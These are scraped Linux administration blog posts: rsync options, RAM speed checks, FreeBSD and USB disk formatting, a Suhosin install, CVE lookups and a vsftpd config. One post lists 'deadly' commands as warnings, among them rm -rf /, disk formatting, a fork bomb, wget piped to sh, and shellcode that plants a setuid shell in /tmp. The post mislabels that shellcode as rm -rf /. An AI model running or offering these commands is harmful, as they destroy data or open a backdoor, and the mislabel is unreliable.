I mirror a directory between my "old" and "new" ftp sites with the command:

rsync -az -e ssh --delete ~ftp/pub/samba nimbus:"~ftp/pub/tridge"

This is launched from cron every few hours.


OPTIONS SUMMARY
Here is a short summary of the options available in rsync. Please refer to the
detailed description below for a complete description.

-v, --verbose increase verbosity
-q, --quiet suppress non-error messages
--no-motd suppress daemon-mode MOTD (see caveat)
-c, --checksum skip based on checksum, not mod-time & size
-a, --archive archive mode; equals -rlptgoD (no -H,-A,-X)
--no-OPTION turn off an implied OPTION (e.g. --no-D)
-r, --recursive recurse into directories
-R, --relative use relative path names
--no-implied-dirs don't send implied dirs with --relative
-b, --backup make backups (see --suffix & --backup-dir)
--backup-dir=DIR make backups into hierarchy based in DIR
--suffix=SUFFIX backup suffix (default ~ w/o --backup-dir)
-u, --update skip files that are newer on the receiver
--inplace update destination files in-place
--append append data onto shorter files
-d, --dirs transfer directories without recursing
-l, --links copy symlinks as symlinks
-L, --copy-links transform symlink into referent file/dir
--copy-unsafe-links only "unsafe" symlinks are transformed
--safe-links ignore symlinks that point outside the tree
-k, --copy-dirlinks transform symlink to dir into referent dir
-K, --keep-dirlinks treat symlinked dir on receiver as dir
-H, --hard-links preserve hard links
-p, --perms preserve permissions
-E, --executability preserve executability
--chmod=CHMOD affect file and/or directory permissions
-A, --acls preserve ACLs (implies -p) [non-standard]
-X, --xattrs preserve extended attrs (implies -p) [n.s.]
-o, --owner preserve owner (super-user only)
-g, --group preserve group
--devices preserve device files (super-user only)
--specials preserve special files
-D same as --devices --specials
-t, --times preserve times
-O, --omit-dir-times omit directories when preserving times
--super receiver attempts super-user activities
-S, --sparse handle sparse files efficiently
-n, --dry-run show what would have been transferred
-W, --whole-file copy files whole (without rsync algorithm)
-x, --one-file-system don't cross filesystem boundaries
-B, --block-size=SIZE force a fixed checksum block-size
-e, --rsh=COMMAND specify the remote shell to use
--rsync-path=PROGRAM specify the rsync to run on remote machine
--existing skip creating new files on receiver
--ignore-existing skip updating files that exist on receiver
--remove-source-files sender removes synchronized files (non-dir)
--del an alias for --delete-during
--delete delete extraneous files from dest dirs
--delete-before receiver deletes before transfer (default)
--delete-during receiver deletes during xfer, not before
--delete-after receiver deletes after transfer, not before
--delete-excluded also delete excluded files from dest dirs
--ignore-errors delete even if there are I/O errors
--force force deletion of dirs even if not empty
--max-delete=NUM don't delete more than NUM files
--max-size=SIZE don't transfer any file larger than SIZE
--min-size=SIZE don't transfer any file smaller than SIZE
--partial keep partially transferred files
--partial-dir=DIR put a partially transferred file into DIR
--delay-updates put all updated files into place at end
-m, --prune-empty-dirs prune empty directory chains from file-list
--numeric-ids don't map uid/gid values by user/group name
--timeout=TIME set I/O timeout in seconds
-I, --ignore-times don't skip files that match size and time
--size-only skip files that match in size
--modify-window=NUM compare mod-times with reduced accuracy
-T, --temp-dir=DIR create temporary files in directory DIR
-y, --fuzzy find similar file for basis if no dest file
--compare-dest=DIR also compare received files relative to DIR
--copy-dest=DIR ... and include copies of unchanged files
--link-dest=DIR hardlink to files in DIR when unchanged
-z, --compress compress file data during the transfer
--compress-level=NUM explicitly set compression level
-C, --cvs-exclude auto-ignore files in the same way CVS does
-f, --filter=RULE add a file-filtering RULE
-F same as --filter='dir-merge /.rsync-filter'
repeated: --filter='- .rsync-filter'
--exclude=PATTERN exclude files matching PATTERN
--exclude-from=FILE read exclude patterns from FILE
--include=PATTERN don't exclude files matching PATTERN
--include-from=FILE read include patterns from FILE
--files-from=FILE read list of source-file names from FILE
-0, --from0 all *from/filter files are delimited by 0s
--address=ADDRESS bind address for outgoing socket to daemon
--port=PORT specify double-colon alternate port number
--sockopts=OPTIONS specify custom TCP options
--blocking-io use blocking I/O for the remote shell
--stats give some file-transfer stats
-8, --8-bit-output leave high-bit chars unescaped in output
-h, --human-readable output numbers in a human-readable format
--progress show progress during transfer
-P same as --partial --progress
-i, --itemize-changes output a change-summary for all updates
--out-format=FORMAT output updates using the specified FORMAT
--log-file=FILE log what we're doing to the specified FILE
--log-file-format=FMT log updates using the specified FMT
--password-file=FILE read password from FILE
--list-only list the files instead of copying them
--bwlimit=KBPS limit I/O bandwidth; KBytes per second
--write-batch=FILE write a batched update to FILE
--only-write-batch=FILE like --write-batch but w/o updating dest
--read-batch=FILE read a batched update from FILE
--protocol=NUM force an older protocol version to be used
--checksum-seed=NUM set block/file checksum seed (advanced)
-4, --ipv4 prefer IPv4
-6, --ipv6 prefer IPv6
--version print version number
(-h) --help show this help (see below for -h comment)

Rsync can also be run as a daemon, in which case the following options are accepted:

--daemon run as an rsync daemon
--address=ADDRESS bind to the specified address
--bwlimit=KBPS limit I/O bandwidth; KBytes per second
--config=FILE specify alternate rsyncd.conf file
--no-detach do not detach from the parent
--port=PORT listen on alternate port number
--log-file=FILE override the "log file" setting
--log-file-format=FMT override the "log format" setting
--sockopts=OPTIONS specify custom TCP options
-v, --verbose increase verbosity
-4, --ipv4 prefer IPv4
-6, --ipv6 prefer IPv6
-h, --help show this help (if used after --daemon)

Thursday, August 20, 2009

The 7 Deadly Linux Commands

SkyHi @ Thursday, August 20, 2009
If you are new to Linux, chances are you will meet someone, perhaps in a forum or chat room, who will try to trick you into using commands that will harm your files or even your entire operating system. To avoid this dangerous scenario, here is a list of deadly Linux commands that you should avoid.

1. Code:

rm -rf /

This command will recursively and forcefully delete all the files inside the root directory.

2. Code:

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
= "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
"\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
"\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
"\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
"\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
"\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68\x00\x2d\x63\x00"
"cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

This is the hex version of [rm -rf /] that can deceive even the rather experienced Linux users.

3. Code:

mkfs.ext3 /dev/sda

This will reformat or wipe out all the files of the device that is mentioned after the mkfs command.

4. Code:

:(){ :|:& };:

Known as forkbomb, this command will tell your system to execute a huge number of processes until the system freezes. This can often lead to corruption of data.
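The same function written with a readable name makes the mechanism plain: a function that pipes into itself and backgrounds the result, doubling the number of processes on every call:

forkbomb() { forkbomb | forkbomb & }; forkbomb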

5. Code:

any_command > /dev/sda

With this command, raw data will be written to a block device that can usually clobber the filesystem resulting in total loss of data.

6. Code:

wget http://some_untrusted_source -O- | sh

Never download from untrusted sources, and then execute the possibly malicious codes that they are giving you.

7. Code:

mv /home/yourhomedirectory/* /dev/null

This command will move all the files inside your home directory to a place that doesn't exist; hence you will never ever see those files again.

There are of course other equally deadly Linux commands that I fail to include here, so if you have something to add, please share it with us via comment.

Reference: http://www.linux-masters.com/2009/08/7-deadly-linux-commands.html

Ubuntu x64 with 4GB RAM but only shows 3GB

SkyHi @ Thursday, August 20, 2009
cat /boot/config-2.6.24-23-generic | grep HIGH

This will show your kernel memory configuration

CONFIG_HIGHMEM=y
CONFIG_HIGHPTE=y
CONFIG_HIGH_RES_TIMERS=y
# CONFIG_NOHIGHMEM is not set
CONFIG_HIGHMEM4G=y
# CONFIG_HIGHMEM64G is not set

Ensure CONFIG_HIGHMEM is set to y and CONFIG_HIGHMEM4G is set to y.
You can also try the server kernel, which is configured to support 64GB by default.

If HIGHMEM and HIGHMEM4G are enabled, it's a BIOS problem.



http://uk.answers.yahoo.com/question/index?qid=20090727102210AAtoEc7
Reference: http://ubuntuforums.org/showthread.php?t=1030027

PHP Redirect To Another URL / Page Script

SkyHi @ Thursday, August 20, 2009
How do I redirect with PHP script?

Under PHP you need to use header() to send a raw HTTP header.

Using the header() method, the visitor can be transferred to the new page without having to click a link to continue. This is also useful for search engines. Remember that header() must be called before any actual output is sent, either by normal HTML tags, blank lines in a file, or from PHP. It is a very common error to read code with include(), require(), or another file access function, and have spaces or empty lines that are output before header() is called. The same problem exists when using a single PHP/HTML file.
PHP Redirect Script

You can easily redirect using following code:


<?php
/* Redirect browser */
header("Location: http://theos.in/");
/* Make sure that code below does not get executed when we redirect. */
exit;
?>


Another sample hack

Sample function - sitefunctions.php (note: I'm not the author of the following; I found it somewhere else on the Internet):

function movePage($num,$url){
static $http = array (
100 => "HTTP/1.1 100 Continue",
101 => "HTTP/1.1 101 Switching Protocols",
200 => "HTTP/1.1 200 OK",
201 => "HTTP/1.1 201 Created",
202 => "HTTP/1.1 202 Accepted",
203 => "HTTP/1.1 203 Non-Authoritative Information",
204 => "HTTP/1.1 204 No Content",
205 => "HTTP/1.1 205 Reset Content",
206 => "HTTP/1.1 206 Partial Content",
300 => "HTTP/1.1 300 Multiple Choices",
301 => "HTTP/1.1 301 Moved Permanently",
302 => "HTTP/1.1 302 Found",
303 => "HTTP/1.1 303 See Other",
304 => "HTTP/1.1 304 Not Modified",
305 => "HTTP/1.1 305 Use Proxy",
307 => "HTTP/1.1 307 Temporary Redirect",
400 => "HTTP/1.1 400 Bad Request",
401 => "HTTP/1.1 401 Unauthorized",
402 => "HTTP/1.1 402 Payment Required",
403 => "HTTP/1.1 403 Forbidden",
404 => "HTTP/1.1 404 Not Found",
405 => "HTTP/1.1 405 Method Not Allowed",
406 => "HTTP/1.1 406 Not Acceptable",
407 => "HTTP/1.1 407 Proxy Authentication Required",
408 => "HTTP/1.1 408 Request Time-out",
409 => "HTTP/1.1 409 Conflict",
410 => "HTTP/1.1 410 Gone",
411 => "HTTP/1.1 411 Length Required",
412 => "HTTP/1.1 412 Precondition Failed",
413 => "HTTP/1.1 413 Request Entity Too Large",
414 => "HTTP/1.1 414 Request-URI Too Large",
415 => "HTTP/1.1 415 Unsupported Media Type",
416 => "HTTP/1.1 416 Requested range not satisfiable",
417 => "HTTP/1.1 417 Expectation Failed",
500 => "HTTP/1.1 500 Internal Server Error",
501 => "HTTP/1.1 501 Not Implemented",
502 => "HTTP/1.1 502 Bad Gateway",
503 => "HTTP/1.1 503 Service Unavailable",
504 => "HTTP/1.1 504 Gateway Time-out"
);
header($http[$num]);
header ("Location: $url");
}

Now call it as follows:

<?php
@include("/path/to/sitefunctions.php");
movePage(403,"http://www.cyberciti.biz/");
?>

Linux Find The Speed Of Memory Through Software Command Prompt

SkyHi @ Thursday, August 20, 2009
How do I find out or identify the speed of my memory (DIMM) through command prompt options under Linux operating systems? How do I find out speed of the DIMM's using a shell prompt?

You can find out the speed using dmidecode or lshw command under any Linux distribution.
Install lshw

If you are using Debian / Ubuntu Linux, enter:
# apt-get install lshw
If you are using RHEL / Fedora / Red Hat / CentOS Linux, enter the following after enabling the EPEL repo:
# yum install lshw
How do I use lshw to display DIMM speed?

Type the command as follows:
# lshw -short -C memory
Outputs:

H/W path Device Class Description
=======================================================
/0/0 memory 108KiB BIOS
/0/4/6 memory 16KiB L1 cache
/0/4/7 memory 8MiB L2 cache
/0/5/8 memory 16KiB L1 cache
/0/5/9 memory 8MiB L2 cache
/0/16 memory 12GiB System Memory
/0/16/0 memory 2GiB DIMM Synchronous 667 MHz (1.5 ns)
/0/16/1 memory 2GiB DIMM Synchronous 667 MHz (1.5 ns)
/0/16/2 memory 2GiB DIMM Synchronous 667 MHz (1.5 ns)
/0/16/3 memory 2GiB DIMM Synchronous 667 MHz (1.5 ns)
/0/16/4 memory 2GiB DIMM Synchronous 667 MHz (1.5 ns)
/0/16/5 memory DIMM Synchronous 667 MHz (1.5 ns) [empty]
/0/16/6 memory 2GiB DIMM Synchronous 667 MHz (1.5 ns)
/0/16/7 memory DIMM Synchronous 667 MHz (1.5 ns) [empty]

See how to use dmidecode to find out RAM speed and type under Linux.

Reference: http://www.cyberciti.biz/faq/linux-find-memory-speed-dimm-command/

Linux: Check Ram Speed and Type

SkyHi @ Thursday, August 20, 2009
How do I check RAM speed and type (like DDR or DDR2) without opening my computer? I need to purchase RAM and I need to know the exact speed and type installed. How do I find out RAM information from a shell prompt?

You need to use the dmidecode command line utility. Dmidecode is a tool for dumping a computer's DMI (some say SMBIOS) table contents in a human-readable format. The output contains a description of the system's hardware components, as well as other useful pieces of information such as serial numbers and BIOS revision. This command works under Linux, UNIX and BSD computers.
Open a shell prompt and type the following command:
$ sudo dmidecode --type 17
OR
$ sudo dmidecode --type 17 | more
Sample output:

# dmidecode 2.9
SMBIOS 2.4 present.

Handle 0x0018, DMI type 17, 27 bytes
Memory Device
Array Handle: 0x0017
Error Information Handle: Not Provided
Total Width: 64 bits
Data Width: 64 bits
Size: 2048 MB
Form Factor: DIMM
Set: None
Locator: J6H1
Bank Locator: CHAN A DIMM 0
Type: DDR2
Type Detail: Synchronous
Speed: 800 MHz (1.2 ns)
Manufacturer: 0x2CFFFFFFFFFFFFFF
Serial Number: 0x00000000
Asset Tag: Unknown
Part Number: 0x5A494F4E203830302D3247422D413131382D

Handle 0x001A, DMI type 17, 27 bytes
Memory Device
Array Handle: 0x0017
Error Information Handle: Not Provided
Total Width: Unknown
Data Width: Unknown
Size: No Module Installed
Form Factor: DIMM
Set: None
Locator: J6H2
Bank Locator: CHAN A DIMM 1
Type: DDR2
Type Detail: None
Speed: Unknown
Manufacturer: NO DIMM
Serial Number: NO DIMM
Asset Tag: NO DIMM
Part Number: NO DIMM

See also:

1. Linux Find The Speed Of Memory Through Software Command Prompt

Reference: http://www.cyberciti.biz/faq/check-ram-speed-linux/

FreeBSD: How To Add A Second Hard Disk

SkyHi @ Thursday, August 20, 2009
Q. How do I add a second hard disk to my FreeBSD server? How do I partition, label and mount a new hard disk under FreeBSD for backup or additional data?

A. There are two ways to install a new hard disk under a FreeBSD system. You can use command line utilities such as fdisk, bsdlabel and newfs to create partitions, label and format it. This method requires a complete understanding of BSD partitions and related details.
Using sysinstall - Easy way to add a new hard disk

The sysinstall utility is used for installing and configuring FreeBSD systems including hard disks. sysinstall offers options to partition and label a new disk using its easy to use menus. Login as root user. Run sysinstall and enter the Configure menu. Within the FreeBSD Configuration Menu, scroll down and select the Fdisk option:
# sysinstall
Alternatively, use sudo (if configured) to run sysinstall:
$ sudo sysinstall
[Warning: examples may crash your computer] WARNING! These examples may result in data loss or crash your computer if executed without proper care. This FAQ assumes that you have added a hard disk to the system. Also, replace ad with da (if using a SCSI hard disk). Please note that any existing data on the 2nd hard disk will get wiped out. Make sure you have a backup of all important data and config files.
Fig.01: Scroll down to Configure and press [enter]

Fig.02: Select Fdisk and press [enter]

Fig.03: Select the appropriate drive and press [enter]

The new drive will probably be the second in the list with a name like ad1 or ad2 and so on. In above example it is ad6.
Using fdisk

Once inside fdisk, pressing A will use the entire disk for FreeBSD. When asked if you want to "remain cooperative with any future possible operating systems", answer YES. Write the changes to the disk using W. Now exit the FDISK editor by pressing Q. Next you will be asked about the "Master Boot Record". Since you are adding a disk to an already running system, choose None. The next dialog will say that the operation was successful. Press [enter]. Type Q to quit FDISK.
Using disklabel

Next, you need to exit sysinstall and start it again. Restart sysinstall by typing sysinstall:
# sysinstall
Select Configure and press [enter]. Select Label and press [enter]. A dialog asking you to select the drive will appear. Select the appropriate drive and press [enter].

This is where you will create the traditional BSD partitions:

1. A disk can have up to eight partitions, labeled a-h.
2. The a partition is used for the root partition (/). Thus only your system disk (e.g, the disk you boot from) should have an a partition.
3. The b partition is used for swap partitions, and you may have many disks with swap partitions.
4. The c partition addresses the entire disk in dedicated mode, or the entire FreeBSD slice in slice mode.
5. The other partitions are for general use.

Now press C to create a partition.

* Set partition size, to use the whole drive, press [enter].
* Next, choose fs and press [enter].
* Type /disk2 as mount point and press [enter] (don't use the name of a directory that already exists because sysinstall will mount the new partition on top of it)
* To finalize the changes, press W, select yes and press [enter].

Update /etc/fstab

The last step is to edit /etc/fstab to add an entry for your new disk, enter:
# vi /etc/fstab
Append an entry like the following (make sure you replace the partition name with the actual value):

/dev/ad6s1d /disk2 ufs rw 2 2

For reference, here is sample df -H output from my system, showing the new filesystem mounted at /disk2:

Filesystem     Size   Used   Avail  Capacity  Mounted on
/dev/ad4s1a    520M   393M    85M      82%    /
devfs          1.0k   1.0k     0B     100%    /dev
/dev/ad6s1d    243G    75G   148G      34%    /disk2
/dev/ad4s1d    520M    22M   456M       5%    /tmp
/dev/ad4s1f    230G   4.6G   207G       2%    /usr
/dev/ad4s1e     10G   130M   9.4G       1%    /var
devfs          1.0k   1.0k     0B     100%    /var/named/dev
devfs          1.0k   1.0k     0B     100%    /usr/home/jail/www.example.com/dev

Save and close the file. The new drive should mount automatically at /disk2 after reboot. To mount it immediately, enter:
# mount -a
# df -H


Reference: http://www.cyberciti.biz/faq/freebsd-adding-second-hard-disk-howto/

Explain: Five Nines ( 99.999% ) Computer / Network Uptime Concept

SkyHi @ Thursday, August 20, 2009
Q. Some service providers guarantee 99.999% uptime for their service. Can you explain the meaning of five nines?

A. The uptime and reliability of computer and communications facilities is sometimes measured in nines. A system with 99.999% availability is highly available, delivering its service 99.999% of the time it is needed. In other words, 99.999% uptime allows a total downtime of approximately five minutes and fifteen seconds per year.
Availability   Downtime/day   Downtime/month   Downtime/year
99.999%        00:00:00.4     00:00:26         00:05:15
99.99%         00:00:08       00:04:22         00:52:35
99.9%          00:01:26       00:43:49         08:45:56
99%            00:14:23       07:18:17         87:39:29
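You can verify these figures yourself: for a given availability percentage, the yearly downtime is simply (100 - availability)/100 of a year. For example, using awk:
$ awk -v a=99.999 'BEGIN { s = (100 - a) / 100 * 365.25 * 24 * 3600; printf "%.0f seconds (about %.1f minutes) per year\n", s, s / 60 }'
316 seconds (about 5.3 minutes) per year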

A service level agreement (SLA) is a part of a service contract where the level of service, including uptime, is formally defined. Uptime agreements are a very common metric, often used for data and network services such as hosting, servers, dedicated servers and leased lines. Common agreements include percentage of network uptime, power uptime, the number of scheduled maintenance windows, and so on.

To achieve true 99.999% uptime you need multiple tier 4 data centers, along with careful capacity planning. 99.999% uptime is recommended for mission-critical systems and e-commerce.

You can run the following command on UNIX / Linux to see uptime:
$ uptime
Under Windows Server 2003 / 2008, XP or Vista, type the following command at the command prompt to see uptime:
systeminfo | find "Up Time"

Red Hat / CentOS Linux Install Suhosin PHP 5 Protection Security Patch

SkyHi @ Thursday, August 20, 2009
Q. WordPress and many other open-source application developers ask users to protect PHP apps using the Suhosin patch to gain protection from full exploits. Suhosin is an advanced protection system for PHP installations. It was designed to protect your servers from various attacks. How do I install Suhosin under RHEL / CentOS / Fedora Linux?

A. Suhosin is designed to protect servers against a number of well-known problems in PHP applications and, on the other hand, against potential unknown vulnerabilities within those applications or the PHP core itself, including WordPress and many other open-source PHP-based apps.
Install Suhosin as extension

Download the latest version of Suhosin, enter:
# cd /opt
# wget http://download.suhosin.org/suhosin-0.9.27.tgz
Make sure you have php-devel installed:
# yum install php-devel
Compile Suhosin under PHP 5 and RHEL / CentOS Linux

Type the following commands to extract the tarball and compile the extension:
# tar -zxvf suhosin-0.9.27.tgz
# cd suhosin-0.9.27
# phpize
# ./configure
# make
# make install
Configure Suhosin

Type the following command to create the Suhosin configuration file:
# echo 'extension=suhosin.so' > /etc/php.d/suhosin.ini
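Before touching the web server, you can confirm that the extension loads cleanly from the command line (php -m lists all loaded modules):
$ php -m | grep -i suhosin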
Restart web server

Type the following command to restart httpd:
# service httpd restart
If you are using lighttpd, enter:
# service lighttpd restart
Verify Suhosin installation

Type the following command:
$ php -v
Sample output:

PHP 5.1.6 (cli) (built: Jun 12 2008 05:02:36)
Copyright (c) 1997-2006 The PHP Group
Zend Engine v2.1.0, Copyright (c) 1998-2006 Zend Technologies
with XCache v1.2.2, Copyright (c) 2005-2007, by mOo
with Suhosin v0.9.27, Copyright (c) 2007, by SektionEins GmbH

You can find more information by running phpinfo():

<?php
phpinfo();
?>

Sample output:
Fig.01: Suhosin information and settings displayed by phpinfo().

Linux / UNIX Shell: Sort IP Address

SkyHi @ Thursday, August 20, 2009
Q. I'd like to sort a list of IP addresses stored in a text file. How do I sort by the last octet or by the entire address under Linux or UNIX operating systems?

A. You need to use the sort command, which displays the lines of its input in sorted order. Sorting is done based on one or more sort keys extracted from each line of input. By default, the entire input line is taken as the sort key, and blank space is used as the default field separator.
Sort command to sort IP address

Here is our sample input file:

192.168.1.100
192.168.1.19
192.168.1.102
192.168.2.1
192.168.0.2

Type the following sort command:
$ sort -t . -k 3,3n -k 4,4n /path/to/file
Sample output:

192.168.0.2
192.168.1.19
192.168.1.100
192.168.1.102
192.168.2.1

Where,

* -t . : set the field separator to . (dot), since the octets of an IP address are separated by dots
* -n : sort according to numerical value
* -k opts: sort using the given field number. For example, -k 2 makes the program sort using the second field. The combination -k 3,3n -k 4,4n sorts numerically on the 3rd field first, then breaks ties using the 4th field (a more general variant covering all four octets is shown below).
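To sort on the entire address rather than just the last two octets, extend the same idea to all four fields:
$ sort -t . -k 1,1n -k 2,2n -k 3,3n -k 4,4n /path/to/file
With a recent version of GNU coreutils you can also use version sort, which handles dotted numeric strings such as IP addresses directly:
$ sort -V /path/to/file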

Find Out If Patch Number ( CVE ) Has Been Applied To RHEL / CentOS Linux

SkyHi @ Thursday, August 20, 2009

Q. I know how to update my system using the yum command. But how can I find out whether a particular patch has been applied to a package? How do I search for a CVE patch number applied to a package under Red Hat / CentOS / RHEL / Fedora Linux?

A. You need to use the rpm command. Each rpm package stores information about patches, including the date, a short description and the CVE number. You can use the -q query option together with --changelog to display change information for a package.
rpm --changelog option

Use the command as follows:
rpm -q --changelog {package-name}
rpm -q --changelog {package-name} | more
rpm -q --changelog {package-name} | grep CVE-NUMBER

For example, to find out whether CVE-2008-1927 has been applied to the perl package, enter:
# rpm -q --changelog perl|grep CVE-2008-1927
Sample output:

- CVE-2008-1927 perl: double free on regular expressions with utf8 characters

To list all applied patches for php, enter:
# rpm -q --changelog php
Sample output:

* Tue Jun 03 2008 Joe Orton 5.1.6-20.el5_2.1
- add security fixes for CVE-2007-5898, CVE-2007-4782, CVE-2007-5899,
CVE-2008-2051, CVE-2008-2107, CVE-2008-2108 (#445923)

* Tue Jan 15 2008 Joe Orton 5.1.6-20.el5
- use magic.mime provided by file (#240845)
- fix possible crash with setlocale() (#428675)

* Thu Jan 10 2008 Joe Orton 5.1.6-19.el5
- ext/date: fix test cases for recent timezone values (#266441)

* Thu Jan 10 2008 Joe Orton 5.1.6-18.el5
- ext/date: updates for system tzdata support (#266441)

* Wed Jan 09 2008 Joe Orton 5.1.6-17.el5
- ext/date: use system timezone database (#266441)

* Tue Jan 08 2008 Joe Orton 5.1.6-16.el5
- add dbase extension in -common (#161639)
- add /usr/share/php to builtin include_path (#238455)
- ext/ldap: enable ldap_sasl_bind (#336221)
- ext/libxml: reset stream context (#298031)
...
* Fri May 16 2003 Joe Orton 4.3.1-3
- link odbc module correctly
- patch so that php -n doesn't scan inidir
- run tests using php -n, avoid loading system modules

* Wed May 14 2003 Joe Orton 4.3.1-2
- workaround broken parser produced by bison-1.875

* Tue May 06 2003 Joe Orton 4.3.1-1
- update to 4.3.1; run test suite
- open extension modules with RTLD_NOW rather than _LAZY

How do I find the CVEs for an rpm file itself?

The above command queries installed packages only. To query an rpm file, enter:
$ rpm -qp --changelog rsnapshot-1.3.0-1.noarch.rpm | more
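If you want to check every installed package for a given CVE, a simple (if slow) shell loop over rpm -qa does the job; replace CVE-2008-1927 with the number you are looking for:
# for p in $(rpm -qa); do rpm -q --changelog "$p" | grep -q 'CVE-2008-1927' && echo "$p"; done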

Linux format external USB hard disk Partition

SkyHi @ Thursday, August 20, 2009
Q. I have a new external hard drive connected via a USB port under Red Hat Fedora Core Linux. I want to use it for backup. There are two partitions, /dev/sda1 and /dev/sda2. This hard disk was set up and formatted by a friend under Windows XP (NTFS partitions). Now I want to format one partition for Linux and keep the other for Windows XP.

How do I format sda1 without losing data from /dev/sda2?

A. To format /dev/sda1 as a Linux ext3 partition, use the mkfs.ext3 command, which creates an ext2/ext3 filesystem.

Type the command as follows:
# mkfs.ext3 /dev/sda1

Before hitting the [enter] key, double-check the partition device name (/dev/sda1). If unsure, back up important data to a USB pen drive or DVD first.


Step 1: identify the device name by running dmesg after plugging in the drive:

nik@Januty:~$ dmesg
[ 3573.698883] usbcore: registered new interface driver usb-storage
[ 3573.698890] USB Mass Storage support registered.
[ 3573.699114] usb-storage: device found at 3
[ 3573.699117] usb-storage: waiting for device to settle before scanning
[ 3578.690390] usb-storage: device scan complete
[ 3578.691230] scsi 2:0:0:0: Direct-Access WDC WD40 0BB-23JHA1 1C06 PQ: 0 ANSI: 2 CCS
[ 3578.692345] sd 2:0:0:0: Attached scsi generic sg2 type 0
[ 3578.698932] sd 2:0:0:0: [sdb] 78156288 512-byte logical blocks: (40.0 GB/37.2 GiB)
[ 3578.701348] sd 2:0:0:0: [sdb] Write Protect is off
[ 3578.701356] sd 2:0:0:0: [sdb] Mode Sense: 00 38 00 00
[ 3578.701361] sd 2:0:0:0: [sdb] Assuming drive cache: write through
[ 3578.706594] sd 2:0:0:0: [sdb] Assuming drive cache: write through
[ 3578.706605] sdb: sdb1
[ 3578.715633] sd 2:0:0:0: [sdb] Assuming drive cache: write through
[ 3578.715642] sd 2:0:0:0: [sdb] Attached SCSI disk


Step 2: create the filesystem. Running mkfs.ext3 against /dev/sdb as a normal user fails twice over: /dev/sdb is the whole device rather than a partition, and mkfs requires root privileges:

nik@Januty:~$ mkfs.ext3 /dev/sdb
mke2fs 1.41.9 (22-Aug-2009)
/dev/sdb is entire device, not just one partition!
Proceed anyway? (y,n) y
mkfs.ext3: Permission denied while trying to determine filesystem size

The correct invocation targets the partition and uses sudo:
nik@Januty:~$ sudo mkfs.ext3 /dev/sdb1

Step 3: create a mount point and mount the new filesystem:
nik@Januty:~$ sudo mkdir /mnt/sdb
nik@Januty:~$ sudo mount /dev/sdb1 /mnt/sdb



Ubuntu Linux format USB pen drive

Q. How do I format a USB pen drive under Ubuntu Linux for ext3 file system?
A. You can format a USB pen drive with the help of the following commands:

[a] fdisk : Partition table manipulator for Linux

[b] mkfs.ext3 : Create an ext2/ext3 filesystem by formatting given partition name (/dev/partition)

[c] e2label : Change the label on an ext2/ext3 filesystem

First, make sure the USB pen drive is not mounted. Click on Places > Computer > Select USB pen > Right click > Select Unmount Volume.

Let us assume that /dev/sda1 is the partition name for your USB pen drive. To format it, open an X terminal and type the following command:
$ sudo mkfs.ext3 /dev/sda1
Caution: Be careful when entering the device/partition name; the wrong name can wipe out an entire hard disk!
Now use the e2label command to change the filesystem label on the ext3 filesystem located on device /dev/sda1:
$ sudo e2label /dev/sda1 usb-pen
To create an MS-DOS/Windows-compatible FAT filesystem instead, enter:
$ sudo mkfs.vfat /dev/sda1

Now you are ready to use the USB pen drive.
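Either way, you can confirm the result with blkid, which prints the filesystem type and label of a partition:
$ sudo blkid /dev/sda1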

vsftpd vsftpd.conf

SkyHi @ Thursday, August 20, 2009
[root@web12 home]# cat vsftpd.conf
# Example config file /etc/vsftpd/vsftpd.conf
#
# The default compiled in settings are fairly paranoid. This sample file
# loosens things up a bit, to make the ftp daemon more usable.
# Please see vsftpd.conf.5 for all compiled in defaults.
#
# READ THIS: This example file is NOT an exhaustive list of vsftpd options.
# Please read the vsftpd.conf.5 manual page to get a full idea of vsftpd's
# capabilities.
#
# Allow anonymous FTP? (Beware - allowed by default if you comment this out).
#anonymous_enable=YES
anonymous_enable=NO
#
# Uncomment this to allow local users to log in.
local_enable=YES
#
# Uncomment this to enable any form of FTP write command.
write_enable=YES
#
# Default umask for local users is 077. You may wish to change this to 022,
# if your users expect that (022 is used by most other ftpd's)
local_umask=022
#
# Uncomment this to allow the anonymous FTP user to upload files. This only
# has an effect if the above global write enable is activated. Also, you will
# obviously need to create a directory writable by the FTP user.
#anon_upload_enable=YES
#
# Uncomment this if you want the anonymous FTP user to be able to create
# new directories.
#anon_mkdir_write_enable=YES
#
# Activate directory messages - messages given to remote users when they
# go into a certain directory.
dirmessage_enable=YES
#
# Activate logging of uploads/downloads.
xferlog_enable=YES
#
# Make sure PORT transfer connections originate from port 20 (ftp-data).
connect_from_port_20=YES
#
# If you want, you can arrange for uploaded anonymous files to be owned by
# a different user. Note! Using "root" for uploaded files is not
# recommended!
#chown_uploads=YES
#chown_username=whoever
#
# You may override where the log file goes if you like. The default is shown
# below.
#xferlog_file=/var/log/vsftpd.log
###modified
xferlog_file=/var/log/vsftpd.log
#
# If you want, you can have your log file in standard ftpd xferlog format
#xferlog_std_format=YES
xferlog_std_format=NO
#
# You may change the default value for timing out an idle session.
#idle_session_timeout=600
idle_session_timeout=600
#
# You may change the default value for timing out a data connection.
#data_connection_timeout=120
data_connection_timeout=120
#
# It is recommended that you define on your system a unique user which the
# ftp server can use as a totally isolated and unprivileged user.
#nopriv_user=ftpsecure
#
# Enable this and the server will recognise asynchronous ABOR requests. Not
# recommended for security (the code is non-trivial). Not enabling it,
# however, may confuse older FTP clients.
#async_abor_enable=YES
#
# By default the server will pretend to allow ASCII mode but in fact ignore
# the request. Turn on the below options to have the server actually do ASCII
# mangling on files when in ASCII mode.
# Beware that on some FTP servers, ASCII support allows a denial of service
# attack (DoS) via the command "SIZE /big/file" in ASCII mode. vsftpd
# predicted this attack and has always been safe, reporting the size of the
# raw file.
# ASCII mangling is a horrible feature of the protocol.
#ascii_upload_enable=YES
#ascii_download_enable=YES
#
# You may fully customise the login banner string:
ftpd_banner=**** WARNING - Your actions are being logged ****
#
# You may specify a file of disallowed anonymous e-mail addresses. Apparently
# useful for combatting certain DoS attacks.
#deny_email_enable=YES
# (default follows)
#banned_email_file=/etc/vsftpd/banned_emails
#
# You may specify an explicit list of local users to chroot() to their home
# directory. If chroot_local_user is YES, then this list becomes a list of
